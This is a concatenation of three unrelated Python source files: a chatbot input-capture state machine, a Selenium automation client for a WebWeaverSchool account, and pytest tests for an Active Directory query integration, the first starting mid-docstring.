then listen for an answer, captures it, and stops.
When no adequate answer is provided, the machine will provide guidance
in the chat space after some delay, and ask for a retry. Multiple retries
can take place, until correct input is provided, or the machine is
timed out.
The machine can also time out after a (possibly) long duration, and send
a message in the chat space when giving up.
If correct input is mandatory, no time out will take place and the machine
will really need a correct answer to stop.
Data that has been captured can be read from the machine itself.
For example::
value = machine.get('answer')
If the machine is given a key, this is used for feeding the bot store.
For example::
machine.build(key='my_field', ...)
...
value = bot.recall('input')['my_field']
The most straightforward way to process captured data in real-time
is to subclass ``Input``, like in the following example::
class MyInput(Input):
def on_input(self, value):
mail.send_message(value)
machine = MyInput(...)
machine.start()
"""
ANSWER_MESSAGE = _(u"Ok, this has been noted")
RETRY_MESSAGE = _(u"Invalid input, please retry")
CANCEL_MESSAGE = _(u"Ok, forget about it")
RETRY_DELAY = 20.0 # amount of seconds between retries
CANCEL_DELAY = 40.0 # amount of seconds before time out
def on_init(self,
question=None,
question_content=None,
mask=None,
regex=None,
on_answer=None,
on_answer_content=None,
on_answer_file=None,
on_retry=None,
on_retry_content=None,
on_retry_file=None,
retry_delay=None,
on_cancel=None,
on_cancel_content=None,
on_cancel_file=None,
cancel_delay=None,
is_mandatory=False,
key=None,
**kwargs):
"""
Asks for some input
:param question: Message to ask for some input
:type question: str
:param question_content: Rich message to ask for some input
:type question_content: str
:param mask: A mask to filter the input
:type mask: str
:param regex: A regular expression to filter the input
:type regex: str
:param on_answer: Message on successful data capture
:type on_answer: str
:param on_answer_content: Rich message on successful data capture
:type on_answer_content: str in Markdown or HTML format
:param on_answer_file: File to be uploaded on successful data capture
:type on_answer_file: str
:param on_retry: Message to provide guidance and ask for retry
:type on_retry: str
:param on_retry_content: Rich message on retry
:type on_retry_content: str in Markdown or HTML format
:param on_retry_file: File to be uploaded on retry
:type on_retry_file: str
:param retry_delay: Repeat the on_retry message after this delay in seconds
:type retry_delay: int
:param on_cancel: Message on time out
:type on_cancel: str
:param on_cancel_content: Rich message on time out
:type on_cancel_content: str in Markdown or HTML format
:param on_cancel_file: File to be uploaded on time out
:type on_cancel_file: str
:param is_mandatory: If the bot will insist and never give up
:type is_mandatory: boolean
:param cancel_delay: Give up on this input after this delay in seconds
:type cancel_delay: int
:param key: The label associated with data captured in bot store
:type key: str
If a mask is provided, it is used to filter provided input.
Use following conventions to build the mask:
* ``A`` - Any kind of unicode symbol such as ``g`` or ``ç``
* ``9`` - A digit such as ``0`` or ``2``
* ``+`` - When following ``#`` or ``9``, indicates optional extensions
of the same type
* Any other symbol, including punctuation or white space, has to match
exactly.
For example:
* ``9999A`` will match 4 digits and 1 additional character
* ``#9-A+`` will match ``#3-June 2017``
Alternatively, you can provide a regular expression (regex) to extract
useful information from the input.
You can use almost every regular expression that is supported
by python. If parenthesis are used, the function returns the first
matching group.
For example, you can capture an identifier with a given prefix::
machine.build(question="What is the identifier?",
regex=r'ID-\d\w\d+', ...)
...
id = machine.filter('The id is ID-1W27 I believe')
assert id == 'ID-1W27'
As a grouping example, you can capture a domain name by asking for
some e-mail address like this::
machine.build(question="please enter your e-mail address",
regex=r'@([\w.]+)', ...)
...
domain_name = machine.filter('my address is foo.bar@acme.com')
assert domain_name == 'acme.com'
"""
assert question or question_content
self.question = question
self.question_content = question_content
assert regex is None or mask is None # use only one of them
self.regex = regex
self.mask = mask
self.on_answer = on_answer
self.on_answer_content = on_answer_content
self.on_answer_file = on_answer_file
self.on_retry = on_retry
self.on_retry_content = on_retry_content
self.on_retry_file = on_retry_file
self.on_cancel = on_cancel
self.on_cancel_content = on_cancel_content
self.on_cancel_file = on_cancel_file
assert is_mandatory in (True, False)
self.is_mandatory = is_mandatory
if retry_delay is not None:
assert float(retry_delay) > 0
self.RETRY_DELAY = float(retry_delay)
if cancel_delay is not None:
assert float(cancel_delay) > 0
self.CANCEL_DELAY = float(cancel_delay)
assert self.CANCEL_DELAY > self.RETRY_DELAY
self.key = key
states = ['begin',
'waiting',
'delayed',
'end']
transitions = [
{'source': 'begin',
'target': 'waiting',
'action': self.ask},
{'source': 'waiting',
'target': 'end',
'condition': lambda **z : self.get('answer') is not None,
'action': self.stop},
{'source': 'waiting',
'target': 'delayed',
'condition': lambda **z : self.elapsed > self.RETRY_DELAY,
'action': self.say_retry,
},
{'source': 'delayed',
'target': 'end',
'condition': lambda **z : self.get('answer') is not None,
'action': self.stop},
{'source': 'delayed',
'target': 'end',
'condition': lambda **z : self.elapsed > self.CANCEL_DELAY and not self.is_mandatory,
'action': self.cancel},
]
during = {
'begin': self.on_inbound,
'waiting': self.on_inbound,
'delayed': self.on_inbound,
'end': self.on_inbound,
}
self.build(states=states,
transitions=transitions,
initial='begin')
self.start_time = time.time()
@property
def elapsed(self):
"""
Measures time since the question has been asked
Used in the state machine for repeating the question and on time out.
"""
return time.time() - self.start_time
def say_answer(self, input):
"""
Responds on correct capture
:param input: the text that has been noted
:type input: str
"""
text = self.on_answer.format(input) if self.on_answer else None
content = self.on_answer_content.format(input) if self.on_answer_content else None
file = self.on_answer_file if self.on_answer_file else None
if not text and not content:
text = self.ANSWER_MESSAGE.format(input)
self.bot.say(text)
if content or file:
self.bot.say(' ',
content=content,
file=file)
def say_retry(self):
"""
Provides guidance on retry
"""
text = self.on_retry if self.on_retry else None
content = self.on_retry_content if self.on_retry_content else None
file = self.on_retry_file if self.on_retry_file else None
if not text and not content:
text = self.RETRY_MESSAGE
self.bot.say(text)
if content or file:
self.bot.say(' ',
content=content,
file=file)
def say_cancel(self):
"""
Says that input has been timed out
"""
text = self.on_cancel if self.on_cancel else None
content = self.on_cancel_content if self.on_cancel_content else None
file = self.on_cancel_file if self.on_cancel_file else None
if not text and not content:
text = self.CANCEL_MESSAGE
self.bot.say(text)
if content or file:
self.bot.say(' ',
content=content,
file=file)
def ask(self):
"""
Asks the question in the chat space
"""
text = self.question if self.question else None
content = self.question_content if self.question_content else None
self.bot.say(text)
if content:
self.bot.say(' ',
content=content)
self.start_time = time.time()
self.listen()
def listen(self):
"""
Listens for data received from the chat space
This function starts a separate process to scan the
``bot.fan`` queue until time out.
"""
p = Process(target=self.receive)
p.daemon = True
p.start()
return p
def receive(self):
"""
Receives data from the chat space
This function implements a loop until some data has been
actually captured, or until the state machine stops for some reason.
The loop is also stopped when the parameter ``general.switch``
is changed in the context. For example::
engine.set('general.switch', 'off')
"""
logging.info(u"Receiving input")
self.set('answer', None)
try:
while self.bot.engine.get('general.switch', 'on') == 'on':
if self.get('answer'):
break # on good answer
if not self.is_running:
break # on machine stop
try:
if self.bot.fan.empty():
label = 'fan.' + self.bot.id
self.bot.engine.set(label, time.time())
time.sleep(self.TICK_DURATION)
continue
item = self.bot.fan.get(True, self.TICK_DURATION)
if item is None:
break
logging.debug(u"Input has been received")
self.execute(arguments=item)
except Exception as feedback:
logging.exception(feedback)
break
except KeyboardInterrupt:
pass
logging.info(u"Input receiver has been stopped")
def execute(self, arguments=None, **kwargs):
"""
Receives data from the chat
:param arguments: data captured from the chat space
:type arguments: str
This function checks data that is provided, and provides guidance
if needed. It can extract information from the provided mask
or regular expression, and save it for later use.
"""
if not arguments:
self.say_retry()
return
arguments = self.filter(text=arguments)
if not arguments:
self.say_retry()
return
# store at machine level
self.set('answer', arguments)
# store at bot level
if self.key:
self.bot.update('input', self.key, arguments)
# use the input in this instance as well
self.on_input(value=arguments, **kwargs)
# advertise subscribers
if self.key:
self.bot.publisher.put(
self.bot.id,
{'from': self.bot.id,
'input': {'key': self.key, 'value': arguments}})
self.say_answer(arguments)
self.step(event='tick')
def filter(self, text):
"""
Filters data from user input
:param text: Text coming from the chat space
:type text: str
:return: Data to be captured, or None
If a mask is provided, or a regular expression, they are used
to extract useful information from provided data.
Example to read a PO mumber::
machine.build(mask='9999A', ...)
...
po = machine.filter('PO Number is 2413v')
assert po == '2413v'
"""
if self.mask:
return self.search_mask(self.mask, text)
if self.regex:
return self.search_expression(self.regex, text)
return text
def search_mask(self, mask, text):
"""
Searches for structured data in text
:param mask: A simple expression to be searched
:type mask: str
:param text: The string from the chat space
:type text: str
:return: either the matching expression, or None
Use following conventions to build the mask:
* ``A`` - Any kind of unicode symbol, such as ``g`` or ``ç``
* ``9`` - A digit, such as ``0`` or ``2``
* ``+`` - When following ``#`` or ``9``, indicates optional extensions
of the same type
* Any other symbol, including punctuation or white space, has to match
exactly.
Some mask examples:
* ``9999A`` will match 4 digits and 1 additional character
* ``#9-A+`` will match ``#3-June 2017``
Example to read a PO mumber::
machine.build(question="What is the PO number?",
mask='9999A', ...)
...
po = machine.filter('PO Number is 2413v')
assert po == '2413v'
"""
assert mask
assert text
logging.debug(u"Searching for mask '{}'".format(mask))
mask = mask.replace('+', 'pLuS')
mask = re.escape(mask)
mask = mask.replace('pLuS', '+').replace('A', '\S').replace('9', '\d').replace('Z','[^0-9]')
logging.debug(u"- translated to expression '{}'".format(mask))
pattern = re.compile(mask, re.U)
searched = pattern.search(text)
if not searched:
logging.debug(u"- no match")
return None
matched = searched.group()
logging.debug(u"- found '{}'".format(matched))
return matched
def search_expression(self, regex, text):
"""
Searches for a regular expression in text
:param regex: A regular expression to be matched
:type regex: str
:param text: The string from the chat space
:type text: str
:return: either the matching expression, or None
You can use almost every regular expression that is supported
by python. If parenthesis are used, the function returns the first
matching group.
For example, you can capture an identifier with a given prefix::
machine.build(question="What is the identifier?",
regex=r'ID-\d\w\d+', ...)
...
id = machine.filter('The id is ID-1W27 I believe')
assert id == 'ID-1W27'
As a grouping example, you can capture a domain name by asking for
some e-mail address like this::
machine.build(question="please enter your e-mail address",
regex=r'@([\w.]+)', ...)
...
domain_name = machine.filter('my address is foo.bar@acme.com')
assert domain_name == 'acme.com'
"""
assert regex
assert text
logging.debug(u"Searching for expression '{}'".format(regex))
pattern = re.compile(regex, re.I)
searched = pattern.search(text)
if not searched:
logging.debug(u"- no match")
return None
matched = searched.group()
if len(searched.groups()) > 0: # return the first matching group
matched = searched.groups()[0]
logging.debug(u"- found '{}'".format(matched))
return matched
def on_input(self, value, **kwargs):
"""
Processes input data
:param value: data that has been captured
:type value: str
This function is called as soon as some input has been captured.
It can be overlaid in subclass, as in the following example::
class MyInput(Input):
def on_input(self, value):
mail.send_message(value)
machine = MyInput(...)
machine.start()
The extra parameters wil be used in case of attachment with
the value.
"""
pass
def on_inbound(self, **kwargs):
"""
Updates the chat on inbound message
"""
if kwargs.get('event') != 'inbound':
return
logging.debug(u"Receiving inbound message")
message = kwargs('message')
self.bot.say(_(u"Received {}: {} (from {})").format(
message['input']['key'],
message['input']['value'],
message['from']))
def cancel(self):
"""
Cancels the question
Used by the state machine on time out
"""
self.say_cancel()
self.stop()
|
_agent.py | from typing import *
import time
import json
import threading
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import Select
import selenium.common.exceptions
import win10toast
from .references import *
from . import utils
class Agent:
def __init__(self: ClassVar, url: str = "", user: str = "", passwd: str = "", hide: bool = True,
wait: [float, int] = 0.5, no_notification: bool = False, file=None):
"""
THIS PROJECT WAS CREATED BY A STUDENT. THERE ARE MANY FUNCTIONS THAT ONLY ADMINS HAVE OR THAT HAVE NOT BEEN RELEASED TO ME. THESE ARE NOT INCLUDED.
:param url: URL of your wws-System.
:param user: E-Mail of your WebWeaverSchool-Account (Normally name@schoolname.wwsurl.topleveldomain)
:param passwd: Password of your WebWeaverSchool-Account
:param hide: True if you don't want
:param wait: Time the System waits for API-Requests/Page-Builings before starting to act after page-load.
:param no_notification: Set true if you don't want do see a success notification
:param file: If set all other params are ignored. Sets the settings in a file
"""
utils.extra.ensure_chromedriver() # Ensure the newest chromedriver is installed.
if file is not None:
f = json.load(file)
self.URL = f["url"]
self.USER = f["user"]
self.PASS = f["passwd"]
self.maw = f["wait"]
else:
self.URL = url
self.USER = user
self.PASS = passwd
self.maw = wait
self.holdOn = False
self.genwins = []
self.parent = self
self.foundwins = []
self.quicks = []
self.acting = True
opts = webdriver.ChromeOptions()
opts.headless = hide
self.driver = webdriver.Chrome('./chromedriver.exe', options=opts)
self.driver.set_window_size(1500, 1000)
self._nav("/wws/100001.php")
self.driver.find_element(by=By.CSS_SELECTOR, value="a.language_selection_current_link").click()
for lang in self.driver.find_elements(by=By.CSS_SELECTOR, value="a.language_selection_option_link"):
if lang.text == "Deutsch":
lang.click()
break
self.mainwin = self.driver.current_window_handle
time.sleep(self.maw)
self.events = Events()
if not no_notification:
win10toast.ToastNotifier().show_toast("WWSHC", "WebWeaverSchoolHackClient-Agent erfolgreich gestartet.",
threaded=True)
self.acting = False
def hold(self: ClassVar, autostop: bool = True):
"""
Hold the window opened (useless if headless)
:param autostop: Atomatticcally stop holding if the window is closed.
"""
self.holdOn = True
while self.holdOn:
time.sleep(self.maw)
if autostop:
try:
if len(self.driver.window_handles) == 0:
break
else:
pass
except selenium.common.exceptions.InvalidSessionIdException:
break
except selenium.common.exceptions.WebDriverException:
break
@utils.extra.acting()
def quit(self: ClassVar) -> bool:
"""
Close the Window
:return: Success
"""
try:
self.driver.quit()
return True
except selenium.common.exceptions.InvalidSessionIdException:
return False
except selenium.common.exceptions.WebDriverException:
return False
def _navto(self: ClassVar):
"""
Navigate to the web-page of this element
"""
self.check()
self.driver.find_element(by=By.ID, value="top_chapter_first").click()
def _nav(self, suburl: str):
"""
Navigate to the given url.
:param suburl: URL to navigate to.
"""
self.driver.get(self.URL + suburl)
self.check()
def check(self: ClassVar):
"""
Checks if a login is needed and logs in.
"""
try:
time.sleep(self.maw)
self.driver.find_element(by=By.CSS_SELECTOR, value='[html_title="Einloggen"').click()
self.driver.find_element(by=By.ID, value="login_login").send_keys(self.USER)
self.driver.find_element(by=By.ID, value="login_password").send_keys(self.PASS)
self.driver.find_element(by=By.NAME, value="login_submit").click()
except selenium.common.exceptions.NoSuchElementException:
pass
@utils.extra.acting()
@cache.cached()
def class_list(self: ClassVar) -> List[Class]:
"""
Use this to list all Classes are available for you
:return: List
"""
self.check()
clss = []
for c in Select(self.driver.find_element(by=By.CSS_SELECTOR, value='[html_title="Meine Klassen"]')).options:
if c.text != "Meine Klassen" and c.text != "--------------------------------------":
clss.append(Class(c.text, self))
return clss
@utils.extra.acting()
@cache.cached()
def class_get(self, name: str) -> Class:
"""
Use this to get a Class available for you
:raise wwshc.err.NoSuchClass: If the Class is not available for you or is not existing
:param name: Name of the Class you want to have
:return: The Class you requested
"""
self.check()
for c in self.class_list(_ignore=True):
if c.name == name:
self.parent.acting = False
return c
raise utils.exceptions.NoSuchClass(f"No class with name '{name}' found.")
@utils.extra.acting()
@cache.cached()
def groups_list(self: ClassVar) -> List[Group]:
"""
Use this to list all Groups are available for you
:return: List of all Groups
"""
self.check()
grps = []
for g in Select(self.driver.find_element(by=By.CSS_SELECTOR, value='[html_title="Meine Gruppen"')).options:
if g.text != "Meine Gruppen" and g.text != "Gruppenübersicht" and g.text != "--------------------------------------":
grps.append(Group(g.text, self))
return grps
@utils.extra.acting()
@cache.cached()
def groups_get(self, name: str):
"""
Use this to get a Group avalible for you
:raise wwshc.err.NoSuchGroup: If the Group is not avalible for you or is not existing
:param name: Name of the Group you want to have
:return: The Group you requested
"""
self.check()
for g in self.groups_list():
if g.name == name:
self.parent.acting = False
return g
raise utils.exceptions.NoSuchGroup(f"No group with name '{name}' found.")
@cache.cached()
@utils.extra.acting()
def users_list(self, only_online=False, stop_name="", stop_mail=""):
"""
Use this to list all Users in Contacts
:param only_online: If you want to list ony people are online.
:return: List of all Users in Contacts
"""
self._navto()
self.driver.find_element(by=By.ID, value="menu_105492").find_element(by=By.TAG_NAME, value="a").click()
res = []
if not only_online:
self.driver.find_element(by=By.LINK_TEXT, value="Alle Mitglieder anzeigen").click()
for u in self.driver.find_element(by=By.CLASS_NAME, value="table_list").find_element(
by=By.TAG_NAME, value="tbody").find_elements(by=By.TAG_NAME, value="tr"):
if not u.text == "":
res.append(User(u.find_elements(by=By.TAG_NAME, value="td")[3].text,
u.find_elements(by=By.TAG_NAME, value="td")[4].text, self, self))
if u.text == stop_name:
return res
return res
@utils.extra.acting()
def users_add(self, name_or_mail):
try:
self._navto()
self.driver.find_element(by=By.ID, value="menu_105492").find_element(by=By.TAG_NAME, value="a").click()
self.driver.find_element(by=By.LINK_TEXT, value="Mitglied aufnehmen").click()
time.sleep(self.maw)
utils.extra.use_popup(self)
self.driver.find_element(by=By.NAME, value="add_member").send_keys(name_or_mail)
try:
self.driver.find_element(by=By.CLASS_NAME, value="submit").click()
self.driver.find_element(by=By.CLASS_NAME, value="submit").click()
except selenium.common.exceptions.NoSuchElementException:
raise utils.exceptions.AlreadyInContacts("This User is already in your contact list")
time.sleep(self.maw)
utils.extra.use_main(self)
except selenium.common.exceptions.UnexpectedAlertPresentException as e:
if e.alert_text == "Kein gültiger Nutzer":
raise utils.exceptions.NoSuchUser(f"The User {name_or_mail} is not existing.")
else:
print(e.alert_text)
@utils.extra.acting()
def users_remove(self, name_or_mail):
self._navto()
self.driver.find_element(by=By.ID, value="menu_105492").find_element(by=By.TAG_NAME, value="a").click()
print(self.driver.find_element(by=By.CLASS_NAME, value="jail_table").find_element(by=By.TAG_NAME, value="tbody")
.find_element(by=By.XPATH, value=f"//*[contains(text(),'{name_or_mail}')]"))
self.driver.find_element(by=By.CLASS_NAME, value="jail_table").find_element(by=By.TAG_NAME, value="tbody") \
.find_element(by=By.XPATH, value=f"//*[contains(text(),'{name_or_mail}')]") \
.find_element(by=By.XPATH, value="..").find_element(by=By.CSS_SELECTOR, value=".icons") \
.find_element(by=By.CSS_SELECTOR, value='[html_title="Weitere Funktionen"]').click()
time.sleep(self.maw)
self.driver.find_element(by=By.CLASS_NAME, value="jail_table").find_element(by=By.TAG_NAME, value="tbody") \
.find_element(by=By.XPATH, value=f"//*[contains(text(),'{name_or_mail}')]") \
.find_element(by=By.XPATH, value="..").find_element(by=By.CSS_SELECTOR, value=".icons") \
.find_element(by=By.XPATH, value=f"//*[contains(text(),'Löschen')]").click()
self.driver.switch_to.alert()
self.driver.close()
self.driver.switch_to.active_element()
@cache.cached()
def users_getByName(self, name: str):
"""
Use this to get a User in Contacts by his Name
:raise wwshc.err.NoSuchUser: If the User cannot be found by your search arguments
:param name: Name of the User you are requesting.
:return: The User you Requested
"""
for u in self.users_list(stop_name=name):
if u.name == name:
return u
raise utils.exceptions.NoSuchUser(f"No user with name '{name}' found.")
@cache.cached()
def users_getByMail(self, mail: str):
"""
Use this to get a User in Contacts by his E-Mail
:raise wwshc.err.NoSuchUser: If the User cannot be found by your search arguments
:param mail: E-Mail of the User you are requesting.
:return: The User you Requested
"""
for u in self.users_list(stop_mail=mail):
if u.mail == mail:
return u
raise utils.exceptions.NoSuchUser(f"No user with mail '{mail}' found.")
@utils.extra.acting()
def files_uploadFile(self, filepath):
self.driver.find_element(by=By.ID, value="menu_121332").find_element(by=By.TAG_NAME, value="a").click()
self.driver.find_element(by=By.LINK_TEXT, value="Neue Datei ablegen").click()
time.sleep(self.maw)
utils.extra.use_popup(self)
self.driver.find_element(by=By.NAME, value="file[]").send_keys(filepath)
self.driver.find_element(by=By.CLASS_NAME, value="submit").click()
utils.extra.use_main(self)
def files_addFile(self, filepath):
raise NotImplementedError("Cannot add a file.")
def files_removeFile(self, path):
raise NotImplementedError("Cannot remove a file.")
@utils.extra.acting()
def files_addFolder(self, name, description=""):
self.driver.find_element(by=By.ID, value="menu_121332").find_element(by=By.TAG_NAME, value="a").click()
self.driver.find_element(by=By.LINK_TEXT, value="Ordner anlegen").click()
time.sleep(self.maw)
utils.extra.use_popup(self)
self.driver.find_element(by=By.NAME, value="folder").send_keys(name)
self.driver.find_element(by=By.NAME, value="description").send_keys(description)
self.driver.find_element(by=By.CLASS_NAME, value="submit").click()
utils.extra.use_main(self)
def files_removeFolder(self, path):
"""
*** UNDOCUMENTATED ***
"""
raise NotImplementedError("Cannot remove a folder.")
@utils.extra.acting()
@cache.cached()
def tasks_list(self):
self._navto()
res = []
self.driver.find_element(by=By.ID, value="menu_105500").find_element(by=By.TAG_NAME, value="a").click()
for element in self.driver.find_element(by=By.CLASS_NAME, value="jail_table") \
.find_element(by=By.TAG_NAME, value="tbody").find_elements(by=By.TAG_NAME, value="tr"):
res.append(Task(element.find_element(by=By.CLASS_NAME, value="c_title").text,
element.find_element(by=By.CLASS_NAME, value="c_source").text,
element.get_property("sort") == "2", self, self))
return res
def tasks_getByTitle(self, title: str) -> List[Task]:
def f(task: Task) -> bool:
return task.title == title
return list(filter(f, self.tasks_list()))
def tasks_getByAuthor(self, author: str) -> List[Task]:
def f(task: Task) -> bool:
return task.made_by == author
return list(filter(f, self.tasks_list()))
def tasks_getByDone(self, done: bool) -> List[Task]:
def f(task: Task) -> bool:
return task.done is done
return list(filter(f, self.tasks_list()))
@cache.cached()
def eventloop(self) -> threading.Thread:
thread = threading.Thread(target=self._eventloop, daemon=True)
thread.start()
return thread
def _eventloop(self):
self.events.on_event("new_window", self._handler_new_window)
last_window = self.driver.current_window_handle
last_url = self.driver.current_url
last_title = self.driver.title
while True:
time.sleep(self.maw)
# Window Changed
if (self.driver.current_window_handle, self.driver.title, self.driver.current_url,) != (
last_window, last_title, last_url,):
last_window = self.driver.current_window_handle
last_url = self.driver.current_url
last_title = self.driver.title
self.events.cause("status_changed",
status={"window": self.driver.current_window_handle, "title": self.driver.title,
"url": self.driver.current_url})
# New Windows
all = self.parent.driver.window_handles
all.remove(self.parent.mainwin)
for i in self.parent.genwins:
try:
all.remove(i)
except:
pass
for i in self.parent.foundwins:
try:
all.remove(i)
except:
pass
if len(all) > 0 and not self.acting:
self.acting = True
new = all.pop()
self.foundwins.append(new)
self.driver.switch_to.window(new)
time.sleep(self.maw)
self.events.cause("new_window", window=self.driver.current_window_handle, title=self.driver.title,
url=self.driver.current_url)
utils.extra.use_main(self)
self.acting = False
# Quicks
if not self.acting and len(self.quicks) > 0:
self.acting = True
quick = self.quicks.pop()
self.driver.switch_to.window(quick["window"])
time.sleep(self.maw)
text = self.driver.find_element(by=By.XPATH, value='//*[@id="main_content"]/p').text
name = self.driver.find_element(by=By.XPATH,
value='//*[@id="main_content"]/table/tbody/tr[1]/td[2]/span').text
mail = self.driver.find_element(by=By.XPATH,
value='//*[@id="main_content"]/table/tbody/tr[1]/td[2]/span') \
.get_attribute("html_title")
send_time = self.driver.find_element(by=By.XPATH,
value='//*[@id="main_content"]/table/tbody/tr[2]/td[2]').text
self.events.cause("quick_received", text=text, name=name, mail=mail, send_time=send_time)
self.driver.close()
utils.extra.use_main(self)
self.acting = False
def _handler_new_window(self, window, title, url):
if "Quickmessage lesen" in title:
self.quicks.append({"window": window, "title": title, "url": url})
def __repr__(self):
return str(self)
def __str__(self):
return f"Agent(url={repr(self.URL)}, user={repr(self.USER)})"
def __exit__(self):
return self.__del__()
def __del__(self):
try:
if len(self.driver.window_handles) != 0:
self.driver.close()
except selenium.common.exceptions.InvalidSessionIdException:
return False
except selenium.common.exceptions.WebDriverException:
return False
return True
|
Active_Directory_Query_test.py | import demistomock as demisto
from Active_Directory_Query import main, group_dn
import socket
import ssl
from threading import Thread
import time
import os
import pytest
import json
from IAMApiModule import *
from unittest.mock import patch
BASE_TEST_PARAMS = {
'server_ip': '127.0.0.1',
'secure_connection': 'None',
'page_size': '500',
'credentials': {'identifier': 'bad', 'password': 'bad'}
}
RETURN_ERROR_TARGET = 'Active_Directory_Query.return_error'
def test_bad_host_no_ssl(mocker):
mocker.patch.object(demisto, 'params',
return_value=BASE_TEST_PARAMS)
return_error_mock = mocker.patch(RETURN_ERROR_TARGET)
# validate our mock of params
assert demisto.params().get('server_ip') == '127.0.0.1'
main()
assert return_error_mock.call_count == 1
# call_args last call with a tuple of args list and kwargs
err_msg = return_error_mock.call_args[0][0]
assert len(err_msg) < 100
assert 'Failed to access' in err_msg
@pytest.mark.filterwarnings("ignore::ResourceWarning")
def test_bad_ssl(mocker):
params = BASE_TEST_PARAMS.copy()
params['server_ip'] = '185.199.108.153' # disable-secrets-detection
params['secure_connection'] = 'SSL'
params['port'] = 443
mocker.patch.object(demisto, 'params',
return_value=params)
return_error_mock = mocker.patch(RETURN_ERROR_TARGET)
mocker.patch.object(demisto, "info")
# validate our mock of params
assert demisto.params().get('secure_connection') == 'SSL'
main()
assert return_error_mock.call_count == 1
# call_args last call with a tuple of args list and kwargs
err_msg = return_error_mock.call_args[0][0]
assert len(err_msg) < 100
assert 'Failed to access' in err_msg
assert 'SSL error' in err_msg
def ssl_bad_socket_server(port):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# cert and keyfile generated with
# openssl req -x509 -nodes -days 3000 -newkey rsa:2048 -keyout key.pem -out cert.pem
try:
context.load_cert_chain('cert.pem', 'key.pem')
with socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) as sock:
sock.bind(('127.0.0.1', port))
sock.listen(5)
with context.wrap_socket(sock, server_side=True) as ssock:
try:
conn, addr = ssock.accept()
except ssl.SSLError as err:
if 'TLSV1_ALERT_UNKNOWN_CA' in str(err):
# all is ok. client refused our cert
return
raise
conn.recv(32)
msg = b'THIS IS A TEST SERVER WHICH IGNORES PROTOCOL\n\n'
for x in range(10):
msg += msg
conn.send(msg)
conn.shutdown(socket.SHUT_RDWR)
conn.close()
except Exception as ex:
pytest.fail("Failed starting ssl_bad_socket_server: {}".format(ex))
raise
@pytest.mark.filterwarnings("ignore::ResourceWarning")
def test_faulty_server(mocker):
port = 9638
t = Thread(target=ssl_bad_socket_server, args=(port,))
t.start()
time.sleep(1) # wait for socket server to startup
params = BASE_TEST_PARAMS.copy()
params['server_ip'] = '127.0.0.1' # disable-secrets-detection
params['secure_connection'] = 'SSL'
params['unsecure'] = True
params['port'] = port
mocker.patch.object(demisto, 'params',
return_value=params)
return_error_mock = mocker.patch(RETURN_ERROR_TARGET)
# validate our mock of params
assert demisto.params().get('secure_connection') == 'SSL'
main()
t.join(5)
assert return_error_mock.call_count == 1
# call_args last call with a tuple of args list and kwargs
err_msg = return_error_mock.call_args[0][0]
assert len(err_msg) < 100
assert 'Failed to access' in err_msg
def test_ssl_custom_cert(mocker, request):
ENV_KEY = 'SSL_CERT_FILE'
os.environ[ENV_KEY] = 'cert.pem'
def cleanup():
os.environ.pop(ENV_KEY)
request.addfinalizer(cleanup)
port = 9637
t = Thread(target=ssl_bad_socket_server, args=(port,))
t.start()
time.sleep(1) # wait for socket server to startup
params = BASE_TEST_PARAMS.copy()
params['server_ip'] = '127.0.0.1' # disable-secrets-detection
params['secure_connection'] = 'SSL'
params['port'] = port
mocker.patch.object(demisto, 'params',
return_value=params)
return_error_mock = mocker.patch(RETURN_ERROR_TARGET)
# validate our mock of params
assert demisto.params().get('secure_connection') == 'SSL'
main()
t.join(5)
assert return_error_mock.call_count == 1
# call_args last call with a tuple of args list and kwargs
err_msg = return_error_mock.call_args[0][0]
assert len(err_msg) < 100
assert 'Failed to access' in err_msg
assert 'SSL error' not in err_msg
def test_endpoint_entry():
"""
Given:
Custom attributes to filter the computer object entry.
When:
The function filters the computer object according to the custom attributes.
Then:
The function will return all the computer object entry because custom attributes contain '*'.
"""
from Active_Directory_Query import endpoint_entry
custom_attributes_with_asterisk = endpoint_entry({'dn': 'dn', 'name': 'name', 'memberOf': 'memberOf'}, ['*'])
assert custom_attributes_with_asterisk == {'Groups': 'memberOf', 'Hostname': 'name', 'ID': 'dn', 'Type': 'AD'}
def get_outputs_from_user_profile(user_profile):
entry_context = user_profile.to_entry()
outputs = entry_context.get('Contents')
return outputs
def mock_demisto_map_object(object, mapper_name, incident_type):
email = object.get('email')
email_prefix = email.split('@')[0]
return {
'cn': email_prefix,
'mail': email,
'sAMAccountName': email_prefix,
'userPrincipalName': email_prefix,
"ou": "OU=Americas,OU=Demisto"
}
def test_get_iam_user_profile(mocker):
from Active_Directory_Query import get_iam_user_profile
mocker.patch.object(demisto, 'mapObject', side_effect=mock_demisto_map_object)
user_profile = {"email": "test2@paloaltonetworks.com", "username": "test",
"locationregion": "Americas",
"olduserdata": {"email": "test@paloaltonetworks.com", "username": "test",
"locationregion": "Americas"}}
_, ad_user, sam_account_name = get_iam_user_profile(user_profile, 'mock_mapper_out')
assert sam_account_name == 'test'
assert ad_user
def test_update_user_iam__username_change(mocker):
"""
Given:
A valid user profile with valid mapping
When:
Running the `create_user_iam` command
Then:
The user was created successfully in AD.
"""
import Active_Directory_Query
add_args, add_kwargs = [], {}
class ConnectionMocker:
entries = []
result = {'controls': {'1.2.840.113556.1.4.319': {'value': {'cookie': '<cookie>'}}}}
def search(self, *args, **kwargs):
return
def add(self, *args, **kwargs):
nonlocal add_args, add_kwargs
add_args, add_kwargs = args, kwargs
return True
def modify(self, *args, **kwargs):
return True
def modify_dn(self, *args, **kwargs):
return True
Active_Directory_Query.conn = ConnectionMocker()
args = {"user-profile": json.dumps({"email": "test2@paloaltonetworks.com", "username": "test",
"locationregion": "Americas",
"olduserdata": {"email": "test@paloaltonetworks.com", "username": "test",
"locationregion": "Americas"}})}
mocker.patch.object(demisto, 'mapObject', side_effect=mock_demisto_map_object)
mocker.patch('Active_Directory_Query.check_if_user_exists_by_attribute', return_value=True)
mocker.patch('Active_Directory_Query.get_user_activity_by_samaccountname', return_value=True)
mocker.patch('Active_Directory_Query.user_dn', return_value='mock_dn')
user_profile = Active_Directory_Query.update_user_iam(
default_base_dn='mock_base_dn',
args=args,
create_if_not_exists=False,
mapper_out='mock_mapper_out',
disabled_users_group_cn='mock_disabled_users_group_cn'
)
outputs = get_outputs_from_user_profile(user_profile)
assert outputs.get('action') == IAMActions.UPDATE_USER
assert outputs.get('success') is True
assert outputs.get('email') == 'test2@paloaltonetworks.com'
assert outputs.get('username') == 'test2'
def test_create_user_iam(mocker):
"""
Given:
A valid user profile with valid mapping
